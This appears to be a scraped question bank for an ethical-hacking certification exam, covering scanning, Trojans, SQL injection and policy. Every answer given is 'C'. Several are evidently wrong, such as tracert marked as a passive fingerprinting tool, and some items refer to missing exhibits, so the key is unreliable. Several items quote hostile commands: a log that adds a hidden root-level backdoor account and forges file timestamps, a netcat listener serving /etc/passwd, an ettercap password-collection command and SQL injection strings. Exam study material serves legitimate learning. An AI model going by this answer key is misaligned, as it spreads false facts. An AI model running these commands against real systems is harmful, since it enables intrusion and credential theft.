452 After studying the following log entries, what is the attacker ultimately trying to achieve as 271 inferred from the log sequence? 1. mkdir -p /etc/X11/applnk/Internet/.etc 2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd 3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd 4. touch -acmr /etc /etc/X11/applnk/Internet/.etc 5. passwd nobody -d 6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash 7. passwd dns -d 8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd 9. touch -acmr /etc/X11/applnk/Internet/.etc /etc A. Change password of user nobody B. Extract information from a local directory C. Change the files Modification Access Creation times D. Download rootkits and passwords into a new directory

C

452 You are about to be hired by a well known Bank to perform penetration tests. Which of the following documents describes the specifics of the testing, the associated violations, and essentially protects both the bank's interest and your liabilities as a tester? A. Service Level Agreement B. Non-Disclosure Agreement C. Terms of Engagement D. Project Scope

C

453 The practical realities facing organizations today make risk response strategies essential. Which of the following is NOT one of the five basic responses to risk? A. Accept B. Mitigate C. Delegate D. Avoid

C

455 TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. Which of the following tools can be used for passive OS fingerprinting? A. nmap B. ping C. tracert D. tcpdump

C

460 It is a widely used standard for message logging. It permits separation of the software that generates messages, the system that stores them, and the software that reports and analyzes them. This protocol is specifically designed for transporting event messages. Which of the following is being described? A. SNMP B. ICMP C. SYSLOG D. SMS

C

462 Which of the following tools is used by pen testers and analysts specifically to analyze links between data using link analysis and graphs? A. Metasploit B. Wireshark C. Maltego D. Cain & Abel

C

465 You've just discovered a server that is currently active within the same network with the machine you recently compromised. You ping it but it did not respond. What could be the case? A. TCP/IP doesn't support ICMP B. ARP is disabled on the target server C. ICMP could be disabled on the target server D. You need to run the ping command with root privileges

C

466 What tool should you use when you need to analyze extracted metadata from files you collected when you were in the initial stage of penetration test (information gathering)? A. Armitage B. Dimitry C. Metagoofil D. cdpsnarf

C

467 Which of the following is NOT an ideal choice for biometric controls? A. Iris patterns B. Fingerprints C. Height and weight D. Voice

C

47 A computer science student needs to fill some information into a secured Adobe PDF job application that was received from a prospective employer. Instead of requesting a new document that allowed the forms to be completed, the student decides to write a script that pulls passwords from a list of commonly used passwords to try against the secured PDF until the correct password is found or the list is exhausted. Which cryptography attack is the student attempting? A. Man-in-the-middle attack B. Brute-force attack C. Dictionary attack D. Session hijacking

C

470 Suppose you've gained access to your client's hybrid network. On which port should you listen to in order to know which Microsoft Windows workstations has its file sharing enabled? A. 1433 B. 161 C. 445 D. 3389

C

472 What is the term coined for logging, recording and resolving events in a company? A. Internal Procedure B. Security Policy C. Incident Management Process D. Metrics

C

474 A server has been infected by a certain type of Trojan. The hacker intended to utilize it to send and host junk mails. What type of Trojan did the hacker use? A. Turtle Trojans B. Ransomware Trojans C. Botnet Trojan D. Banking Trojans

C

475 First thing you do every office day is to check your email inbox. One morning, you received an email from your best friend and the subject line is quite strange. What should you do? A. Delete the email and pretend nothing happened B. Forward the message to your supervisor and ask for her opinion on how to handle the situation. C. Forward the message to your company's security response team and permanently delete the message from your computer. D. Reply to the sender and ask them for more information about the message contents.

C

485 A possibly malicious sequence of packets that were sent to a web server has been captured by an Intrusion Detection System (IDS) and was saved to a PCAP file. As a network administrator, you need to determine whether this packets are indeed malicious. What tool are you going to use? A. Intrusion Prevention System (IPS) B. Vulnerability scanner C. Protocol analyzer D. Network sniffer

C

486 You may be able to identify the IP addresses and machine names for the firewall, and the names of internal mail servers by: A. Sending a mail message to a valid address on the target network, and examining the header information generated by the IMAP servers B. Examining the SMTP header information generated by using the -mx command parameter of DIG C. Examining the SMTP header information generated in response to an e-mail message sent to an invalid address D. Sending a mail message to an invalid address on the target network, and examining the header information generated by the POP servers

C

486 Which of the following is the BEST way to protect Personally Identifiable Information (PII) from being exploited due to vulnerabilities of varying web applications? A. Use cryptographic storage to store all PII B. Use full disk encryption on all hard drives to protect PII C. Use encrypted communications protocols to transmit PII D. Use a security token to log into all Web applications that use PII

C

488 This configuration allows NIC to pass all traffic it receives to the Central Processing Unit (CPU), instead of passing only the frames that the controller is intended to receive. Select the option that BEST describes the above statement. A. Multi-cast mode B. WEM C. Promiscuous mode D. Port forwarding

C

489 Which of the following is designed to verify and authenticate individuals taking part in a data exchange within an enterprise? A. SOA B. Single-Sign On C. PKI D. Biometrics

C

490 A software tester is randomly generating invalid inputs in an attempt to crash the program. Which of the following is a software testing technique used to determine if a software program properly handles a wide range of invalid input? A. Mutating B. Randomizing C. Fuzzing D. Bounding

C

491 1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms 2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms 3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net (68.100.0.1) 16.743 ms 16.207 ms 4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms 5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms 6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 296 14.104 ms 7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms 8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms 9 so-7-0-0.gar1.NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms 10 so-4-0-0.edge1.NewYork1.Level3.net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms 11 uunet-level3-oc48.NewYork1.Level3.net (209.244.160.12) 21.411 ms 19.133 ms 18.830 ms 12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78) 21.203 ms 22.670 ms 20.111 ms 13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms 23.108 ms 14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms 33.910 ms 15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms 49.466 ms 16 0.so-3-0-0.XR1.MIA4.ALTER.NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms 17 117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms 18 target-gw1.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms 19 www.target.com <http://www.target.com/> (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms 20 www.target.com <http://www.target.com/> (65.195.239.22) 53.561 ms 297 54.121 ms 58.333 ms You perform the above traceroute and notice that hops 19 and 20 both show the same IP address. This probably indicates what? A. A host based IDS B. A Honeypot C. A stateful inspection firewall D. An application proxying firewall

C

496 When security and confidentiality of data within the same LAN is of utmost priority, which IPSec mode should you implement? A. AH Tunnel mode B. AH promiscuous C. ESP transport mode D. ESP confidential

C

498 While performing online banking using a Web browser, Kyle receives an email that contains an image of a well-crafted art. Upon clicking the image, a new tab on the web browser opens and shows an animated GIF of bills and coins being swallowed by a crocodile. After several days, Kyle noticed that all his funds on the bank was gone. What Web browser-based security vulnerability got exploited by the hacker? A. Clickjacking B. Web Form Input Validation C. Cross-Site Request Forgery D. Cross-Site Scripting

C

50 Low humidity in a data center can cause which of the following problems? A. Heat B. Corrosion C. Static electricity D. Airborne contamination

C

53 While performing data validation of web content, a security technician is required to restrict malicious input. Which of the following processes is an efficient way of restricting malicious input? A. Validate web content input for query strings. B. Validate web content input with scanning tools. C. Validate web content input for type, length, and range. D. Validate web content input for extraneous queries.

C

54 A security consultant decides to use multiple layers of anti-virus defense, such as end user desktop anti-virus and E-mail gateway. This approach can be used to mitigate which kind of attack? A. Forensic attack B. ARP spoofing attack C. Social engineering attack D. Scanning attack

C

55 Which of the following resources does NMAP need to be used as a basic vulnerability scanner covering several vectors like SMB, HTTP and FTP? A. Metasploit scripting engine B. Nessus scripting engine C. NMAP scripting engine D. SAINT scripting engine

C

556 Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate. What would you call this kind of activity? A. CI Gathering B. Scanning C. Dumpster Diving D. Garbage Scooping

C

557 A client has approached you with a penetration test requirements. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department. What kind of penetration test would you recommend that would best address the client's concern? A. A Black Box test B. A Black Hat test C. A Grey Box test D. A Grey Hat test 338 E. A White Box test F. A White Hat test

C

558 In which of the following should be performed first in any penetration test? A. System identification B. Intrusion Detection System testing C. Passive information gathering D. Firewall testing

C

57 A security analyst is performing an audit on the network to determine if there are any deviations from the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem installed. Which security policy must the security analyst check to see if dial-out modems are allowed? A. Firewall-management policy B. Acceptable-use policy C. Remote-access policy D. Permissive policy

C

593 Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the IT department of his company installed a wireless network throughout the building. The problem is, is that they are only going to make it available to upper management and the IT department. Most employees don't have a problem with this since they have no need for wireless networking, but Jeffery would really like to use wireless since he has a personal laptop that he works from as much as he can. Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turned down. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to get access to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wireless networks available. After about an hour of trying to figure it out, Jeffery cannot get on the company's wireless network. Discouraged, Jeffery leaves the office and goes home. The next day, Jeffery calls his friend who works with computers. His friend suggests that his IT department might have turned off SSID broadcasting, and that is why he could not see any wireless networks. How would Jeffrey access the wireless network? A. Run WEPCrack tool and brute force the SSID hashes B. Jam the wireless signal by launching denial of service attack C. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext D. Attempt to connect using wireless device default SSIDs

C

597 When a malicious hacker identifies a target and wants to eventually compromise this target, what would be the first step the attacker would perform? A. Cover his tracks by eradicating the log files B. Gain access to the remote computer for identification of venue of attacks C. Perform a reconnaissance of the remote target for identification of venue of attacks D. Always starts with a scan in order to quickly identify venue of attacks

C

600 Lyle is a systems security analyst for Gusteffson & Sons, a large law firm in Beverly Hills. Lyle's responsibilities include network vulnerability scans, Antivirus monitoring, and IDS monitoring. Lyle receives a help desk call from a user in the Accounting department. This user reports that his computer is running very slow all day long and it sometimes gives him an error message that the hard drive is almost full. Lyle runs a scan on the computer with the company antivirus software and finds nothing. Lyle downloads another free antivirus application and scans the computer again. This time a virus is found on the computer. The infected files appear to be Microsoft Office files since they are in the same directory as that software. Lyle does some research and finds that this virus disguises itself as a genuine application on a computer to hide from antivirus software. What type of virus has Lyle found on this computer? A. This type of virus that Lyle has found is called a cavity virus. B. Lyle has discovered a camouflage virus on the computer. C. By using the free antivirus software, Lyle has found a tunneling virus on the computer. D. Lyle has found a polymorphic virus on this computer

C

609 Lori is a Certified Ethical Hacker as well as a Certified Hacking Forensics Investigator working as an IT security consultant. Lori has been hired on by Kiley Innovators, a large marketing firm that recently underwent a string of thefts and corporate espionage incidents. Lori is told that a rival marketing company came out with an exact duplicate product right before Kiley Innovators was about to release it. The executive team believes that an employee is leaking information to the rival company. Lori questions all employees, reviews server logs, and firewall logs; after which she finds nothing. Lori is then given permission to search through the corporate email system. She searches by email being sent to and sent from the rival marketing company. She finds one employee that appears to be sending very large email to this other marketing company, even though they should have no reason to be communicating with them. Lori tracks down the actual emails sent and upon opening them, only finds picture files attached to them. These files seem perfectly harmless, usually containing some kind of joke. Lori decides to use some special software to further examine the pictures and finds that each one had hidden text that was stored in each picture. What technique was used by the Kiley Innovators employee to send information to the rival 368 marketing company? A. The Kiley Innovators employee used cryptography to hide the information in the emails sent B. The method used by the employee to hide the information was logical watermarking C. The employee used steganography to hide information in the picture attachments D. By using the pictures to hide information, the employee utilized picture fuzzing

C

610 You run nmap port Scan on 10.0.0.5 and attempt to gain banner/server information from services running on ports 21, 110 and 123. Here is the output of your scan results: Which of the following nmap command did you run? A. nmap -A -sV -p21,110,123 10.0.0.5 B. nmap -F -sV -p21,110,123 10.0.0.5 C. nmap -O -sV -p21,110,123 10.0.0.5 D. nmap -T -sV -p21,110,123 10.0.0.5

C

616 Stephanie works as senior security analyst for a manufacturing company in Detroit. Stephanie manages network security throughout the organization. Her colleague Jason told her in confidence that he was able to see confidential corporate information posted on the external website http://www.jeansclothesman.com. He tries random URLs on the company's website and finds confidential information leaked over the web. Jason says this happened about a month ago. Stephanie visits the said URLs, but she finds nothing. She is very concerned about this, since someone should be held accountable if there was sensitive information posted on the website. Where can Stephanie go to see past versions and pages of a website? A. She should go to the web page Samspade.org to see web pages that might no longer be on the website B. If Stephanie navigates to Search.com; she will see old versions of the company website C. Stephanie can go to Archive.org to see past versions of the company website D. AddressPast.com would have any web pages that are no longer hosted on the company's website

C

628 In Trojan terminology, what is required to create the executable file chess.exe as shown below? A. Mixer 379 B. Converter C. Wrapper D. Zipper

C

630 This attack uses social engineering techniques to trick users into accessing a fake Web site and divulging personal information. Attackers send a legitimate-looking e-mail asking users to update their information on the company's Web site, but the URLs in the e-mail actually point to a false Web site. A. Wiresharp attack 380 B. Switch and bait attack C. Phishing attack D. Man-in-the-Middle attack

C

634 Your computer is infected by E-mail tracking and spying Trojan. This Trojan infects the computer with a single file - emos.sys Which step would you perform to detect this type of Trojan? 382 A. Scan for suspicious startup programs using msconfig B. Scan for suspicious network activities using Wireshark C. Scan for suspicious device drivers in c:\windows\system32\drivers D. Scan for suspicious open ports using netstat

C

644 You want to capture Facebook website traffic in Wireshark. What display filter should you use that shows all TCP packets that contain the word 'facebook'? A. display==facebook B. traffic.content==facebook C. tcp contains facebook D. list.display.facebook 388

C

648 What type of Trojan is this? A. RAT Trojan B. E-Mail Trojan C. Defacement Trojan D. Destructing Trojan E. Denial of Service Trojan

C

65 What is the name of the international standard that establishes a baseline level of confidence in the security functionality of IT products by providing a set of requirements for evaluation? A. Blue Book B. ISO 26029 C. Common Criteria D. The Wassenaar Agreement

C

66 One way to defeat a multi-level security solution is to leak data via A. a bypass regulator. B. steganography. C. a covert channel. D. asymmetric routing.

C

660 Attackers footprint target Websites using Google Hacking techniques. Google hacking is a term that refers to the art of creating complex search engine queries. It detects websites that are vulnerable to numerous exploits and vulnerabilities. Google operators are used to locate specific strings of text within the search results. The configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. WordPress uses config.php that stores the database Username and Password. 399 Which of the below Google search string brings up sites with "config.php" files? A. Search:index config/php B. Wordpress:index config.php C. intitle:index.of config.php D. Config.php:index list

C

662 Bob has set up three web servers on Windows Server 2008 IIS 7.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of these servers because of the potential for financial loss. Bob has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network. Why will this not be possible? A. Firewalls cannot inspect traffic coming through port 443 B. Firewalls can only inspect outbound traffic C. Firewalls cannot inspect traffic at all, they can only block or allow certain ports D. Firewalls cannot inspect traffic coming through port 80

C

664 Lori was performing an audit of her company's internal Sharepoint pages when she came across the following code: What is the purpose of this code? 402 A. This JavaScript code will use a Web Bug to send information back to another server. B. This code snippet will send a message to a server at 192.154.124.55 whenever the "escape" key is pressed. C. This code will log all keystrokes. D. This bit of JavaScript code will place a specific image on every page of the RSS feed.

C

676 Leesa is the senior security analyst for a publicly traded company. The IT department recently rolled out an intranet for company use only with information ranging from training, to holiday schedules, to human resources data. Leesa wants to make sure the site is not accessible from outside and she also wants to ensure the site is Sarbanes-Oxley (SOX) compliant. Leesa goes to a public library as she wants to do some Google searching to verify whether the company's intranet is accessible from outside and has been indexed by Google. Leesa wants to search for a website title of "intranet" with part of the URL containing the word "intranet" and the words "human resources" somewhere in the webpage. What Google search will accomplish this? A. related:intranet allinurl:intranet:"human resources" B. cache:"human resources" inurl:intranet(SharePoint) C. intitle:intranet inurl:intranet+intext:"human resources" D. site:"human resources"+intext:intranet intitle:intranet

C

681 Which of the following Trojans would be considered 'Botnet Command Control Center'? A. YouKill DOOM B. Damen Rock C. Poison Ivy 412 D. Matten Kit

C

695 Which port, when configured on a switch receives a copy of every packet that passes through it? A. R-DUPE Port B. MIRROR port C. SPAN port D. PORTMON

C

73 During a penetration test, the tester conducts an ACK scan using NMAP against the external interface of the DMZ firewall. NMAP reports that port 80 is unfiltered. Based on this response, which type of packet inspection is the firewall conducting? A. Host B. Stateful C. Stateless D. Application

C

74 Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results? TCP port 21 - no response TCP port 22 - no response TCP port 23 - Time-to-live exceeded A. The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host. B. The lack of response from ports 21 and 22 indicate that those services are not running on the destination server. C. The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall. D. The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error.

C

88 WPA2 uses AES for wireless data encryption at which of the following encryption levels? A. 64 bit and CCMP B. 128 bit and CRC C. 128 bit and CCMP D. 128 bit and TKIP

C

90 You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any information. What should you do next? A. Use NetScan Tools Pro to conduct the scan B. Run nmap XMAS scan against 192.168.1.10 C. Run NULL TCP hping2 against 192.168.1.10 D. The firewall is blocking all the scans to 192.168.1.10

C

91 A newly discovered flaw in a software application would be considered which kind of security vulnerability? A. Input validation flaw B. HTTP header injection vulnerability C. 0-day vulnerability D. Time-to-check to time-to-use flaw

C

248 Exhibit: ettercap -NCLzs --quiet What does the command in the exhibit do in "Ettercap"? A. This command will provide you the entire list of hosts in the LAN B. This command will check if someone is poisoning you and will report its IP. C. This command will detach from console and log all the collected passwords from the network to a file. D. This command broadcasts ping to scan the LAN instead of ARP request of all the subnet IPs.

C (Explanation: -N = NON interactive mode (without ncurses) -C = collect all users and passwords -L = if used with -C (collector) it creates a file with all the password sniffed in the session in the form "YYYYMMDD-collected-pass.log" -z = start in silent mode (no arp storm on start up) -s = IP BASED sniffing --quiet = "demonize" ettercap. Useful if you want to log all data in background.)

205 What does the following command in netcat do? nc -l -u -p 55555 < /etc/passwd A. logs the incoming connections to /etc/passwd file B. loads the /etc/passwd file to the UDP port 55555 C. grabs the /etc/passwd file when connected to UDP port 55555 D. deletes the /etc/passwd file when connected to the UDP port 55555

C (Explanation: -l forces netcat to listen for incoming connections. -u tells netcat to use UDP instead of TCP -p 5555 tells netcat to use port 5555 < /etc/passwd tells netcat to grab the /etc/passwd file when connected to.)

576 Marshall is the information security manager for his company. Marshall was just hired on two months ago after the last information security manager retired. Since the last manager did not implement or even write IT policies, Marshall has begun writing IT security policies to cover every conceivable aspect. Marshall's supervisor has informed him that while most employees will be under one set of policies, ten other employees will be under another since they work on computers in publicly-accessible areas. Per his supervisor, Marshall has written two sets of policies. For the users working on publicly-accessible computers, their policies state that everything is forbidden. They are not allowed to browse the Internet or even use email. The only thing they can use is their work related applications like Word and Excel. What types of policies has Marshall written for the users working on computers in the publiclyaccessible areas? A. He has implemented Permissive policies for the users working on public computers B. These types of policies would be considered Promiscuous policies C. He has written Paranoid policies for these users in public areas D. Marshall has created Prudent policies for the computer users in publicly-accessible areas

C (Explanation: 348 It says that everything is forbidden, this means that there is a Paranoid Policy implemented)

599 Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself. This causes the system to go into an infinite loop trying to resolve this unexpected connection. Eventually, the connection times out, but during this resolution, the machine appears to hang or become very slow. The attacker sends such packets on a regular basis to slow down the system. Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks. What type of Denial of Service attack is represented here? A. SMURF Attacks B. Targa attacks C. LAND attacks D. SYN Flood attacks

C (Explanation: 362 The attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address and an open port as both source and destination.The reason a LAND attack works is because it causes the machine to reply to itself continuously. http://en.wikipedia.org/wiki/LAND)

583 Charlie is an IT security consultant that owns his own business in Denver. Charlie has recently been hired by Fleishman Robotics, a mechanical engineering company also in Denver. After signing service level agreements and other contract papers, Charlie asks to look over the current company security policies. Based on these policies, Charlie compares the policies against what is actually in place to secure the company's network. From this information, Charlie is able to produce a report to give to company executives showing which areas the company is lacking in. This report then becomes the basis for all of Charlie's remaining tests. 352 What type of initial analysis has Charlie performed to show the company which areas it needs improvements in? A. Charlie has performed a BREACH analysis; showing the company where its weak points are B. This analysis would be considered a vulnerability analysis C. This type of analysis is called GAP analysis D. This initial analysis performed by Charlie is called an Executive Summary

C (Explanation: In business and economics, gap analysis is a tool that helps a company to compare its actual performance with its potential performance. At its core are two questions: "Where are we?" and "Where do we want to be?". http://en.wikipedia.org/wiki/Gap_analysis)

339 What are the three phases involved in security testing? A. Reconnaissance, Conduct, Report B. Reconnaissance, Scanning, Conclusion C. Preparation, Conduct, Conclusion D. Preparation, Conduct, Billing

C (Explanation: Preparation phase - A formal contract is executed containing non-disclosure of the client's data and legal protection for the tester. At a minimum, it also lists the IP addresses to be tested and time to test. Conduct phase - In this phase the penetration test is executed, with the tester looking for potential vulnerabilities. Conclusion phase - The results of the evaluation are communicated to the pre-defined organizational contact, and corrective action is advised. 202)

277 Global deployment of RFC 2827 would help mitigate what classification of attack? A. Sniffing attack B. Denial of service attack C. Spoofing attack D. Reconnaissance attack E. Prot Scan attack

C (Explanation: RFC 2827 - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing)

590 Gerald is a Certified Ethical Hacker working for a large financial institution in Oklahoma City. Gerald is currently performing an annual security audit of the company's network. One of the company's primary concerns is how the corporate data is transferred back and forth from the banks all over the city to the data warehouse at the company's home office. To see what type of traffic is being passed back and forth and to see how secure that data really is, Gerald uses a session hijacking tool to intercept traffic between a server and a client. Gerald hijacks an HTML session between a client running a web application which connects to a SQL database at the home office. Gerald does not kill the client's session; he simply monitors the traffic that passes between it and the server. What type of session attack is Gerald employing here? A. He is utilizing a passive network level hijack to see the session traffic used to communicate between the two devices B. Gerald is using a passive application level hijack to monitor the client and server traffic C. This type of attack would be considered an active application attack since he is actively monitoring the traffic D. This type of hijacking attack is called an active network attack

C (Explanation: Session Hijacking is an active attack)

578 Stephanie works as a records clerk in a large office building in downtown Chicago. On Monday, she went to a mandatory security awareness class (Security5) put on by her company's IT department. During the class, the IT department informed all employees that everyone's Internet activity was thenceforth going to be monitored. Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or worse get her fired. Stephanie's daily work duties only consume about four hours of her time, so she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet but definitely does not want to get fired for it. 349 What should Stephanie use so that she does not get in trouble for surfing the Internet? A. Cookie Disabler B. Stealth Anonymizer C. Stealth Firefox D. Stealth IE

C (Explanation: Stealth Firefox If there are times you want to surf the web without leaving a trace in your local computer, then this is the right extension for you. https://addons.mozilla.org/en-US/firefox/addon/1306)

541 What is SYSKEY # of bits used for encryption? A. 40 B. 64 C. 128 D. 256

C (Explanation: System Key hotfix is an optional feature which allows stronger encryption of SAM. Strong encryption protects private account information by encrypting the password data using a 128-bit cryptographically random key, known as a password encryption key. 330)

388 Central Frost Bank was a medium-sized, regional financial institution in New York. The bank recently deployed a new Internet-accessible Web application. Using this application, Central Frost's customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business through a Web browser. John Stevens was in charge of information security at Central Frost Bank. After one month in production, the Internet banking application was the subject of several customer complaints. Mysteriously, the account balances ofmany of Central Frost's customers had been changed! However, moneyhadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries: Attempted login of unknown user: johnm 232 Attempted login of unknown user: susaR Attempted login of unknown user: sencat Attempted login of unknown user: pete''; Attempted login of unknown user: ' or 1=1-- Attempted login of unknown user: '; drop table logins-- Login of user jason, sessionID= 0x75627578626F6F6B Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x9062757944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64 Transfer Funds user jason Pay Bill user mike Logout of user mike What type of attack did the Hacker attempt? A. Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools. B. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability. C. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID. D. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.

C (Explanation: The 1=1 or drop table logins are attempts at SQL injection.)

393 Look at the following SQL query. SELECT * FROM product WHERE PCategory='computers' or 1=1--' What will it return? Select the best answer. A. All computers and all 1's B. All computers C. All computers and everything else D. Everything except computers

C (Explanation: The 1=1 tells the SQL database to return everything, a simplified statement would be SELECT * FROM product WHERE 1=1 (which will always be true for all columns). Thus, this query will return all computers and everything else. The or 1=1 is a common test to see if a web application is vulnerable to a SQL attack. 236)

559 Vulnerability mapping occurs after which phase of a penetration test? A. Host scanning B. Passive information gathering C. Analysis of host scanning D. Network level discovery

C (Explanation: The order should be Passive information gathering, Network level discovery, Host scanning and Analysis of host scanning. 339)

271 What does the following command in "Ettercap" do? ettercap -NCLzs -quiet A. This command will provide you the entire list of hosts in the LAN B. This command will check if someone is poisoning you and will report its IP C. This command will detach ettercap from console and log all the sniffed passwords to a file D. This command broadcasts ping to scan the LAN instead of ARP request all the subset IPs

C (Explanation: -L specifies that logging will be done to a binary file and -s tells us it is running in script mode.)

404 802.11b is considered a ____________ protocol. A. Connectionless B. Secure C. Unsecure D. Token ring based E. Unreliable

C (Explanation: 802.11b is an insecure protocol. It has many weaknesses that can be used by a hacker.)

293 SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections. The signature for SYN Flood attack is: A. The source and destination address having the same value. B. The source and destination port numbers having the same value. C. A large number of SYN packets appearing on a network without the corresponding reply packets. D. A large number of SYN packets appearing on a network with the corresponding reply packets.

C (Explanation: A SYN attack occurs when an attacker exploits the use of the buffer space during a Transmission Control Protocol (TCP) session initialization handshake. The attacker floods the target system's small "in-process" queue with connection requests, but it does not respond when a target system replies to those requests. This causes the target system to time out while waiting for the proper response, which makes the system crash or become unusable. 176)

42 Ann would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point. Which of the following type of scans would be the most accurate and reliable option? A. A half-scan 26 B. A UDP scan C. A TCP Connect scan D. A FIN scan

C (Explanation: A TCP Connect scan, named after the Unix connect() system call is the most accurate scanning method. If a port is open the operating system completes the TCP three-way handshake, and the port scanner immediately closes the connection. Otherwise an error code is returned. Example of a three-way handshake followed by a reset: Source Destination Summary ------------------------------------------------------------------------------------- [192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 SYN SEQ=3362197786 LEN=0 WIN=5840 [192.168.0.10] [192.168.0.8] TCP: D=49389 S=80 SYN ACK=3362197787 SEQ=58695210 LEN=0 WIN=65535 [192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 ACK=58695211 WIN<<2=5840 [192.168.0.8] [192.168.0.10] TCP: D=80 S=49389 RST ACK=58695211 WIN<<2=5840)

87 You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an issue, what type of scan should you run to get very reliable results? A. XMAS scan B. Stealth scan C. Connect scan D. Fragmented packet scan

C (Explanation: A TCP Connect scan, named after the Unix connect() system call is the most accurate scanning method. If a port is open the operating system completes the TCP three-way handshake, and the port scanner immediately closes the connection.)

106 Exhibit: Please study the exhibit carefully. Which Protocol maintains the communication on that way? A. UDP B. IP C. TCP D. ARP E. RARP

C (Explanation: A TCP connection is always initiated with the 3-way handshake, which establishes 63 and negotiates the actual connection over which data will be sent.)

233 Which of the following statements would not be a proper definition for a Trojan Horse? A. An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user. B. A legitimate program that has been altered by the placement of unauthorized code within it; this code perform functions unknown (and probably unwanted) by the user. C. An authorized program that has been designed to capture keyboard keystrokes while the user remains unaware of such an activity being performed. D. Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

C (Explanation: A Trojan is all about running unauthorized code on the users computer without the user knowing of it.)

546 _____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length. A. Bit Cipher B. Hash Cipher C. Block Cipher D. Stream Cipher

C (Explanation: A block cipher is a symmetric key cipher which operates on fixed-length groups of bits, termed blocks, with an unvarying transformation. When encrypting, a block cipher might take 332 a (for example) 128-bit block of plaintext as input, and output a corresponding 128-bit block of ciphertext.)

522 Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threat, but it does not secure the application from coding errors. It can provide data privacy, integrity and enable strong 317 authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns? A. Bob can explain that a random generator can be used to derive cryptographic keys but it uses a weak seed value and it is a form of programming error. B. Bob can explain that by using passwords to derive cryptographic keys it is a form of a programming error. C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique. D. Bob can explain that by using a weak key management technique it is a form of programming error.

C (Explanation: A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries (usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program. Technically, a buffer overflow is a problem with the program's internal implementation.)

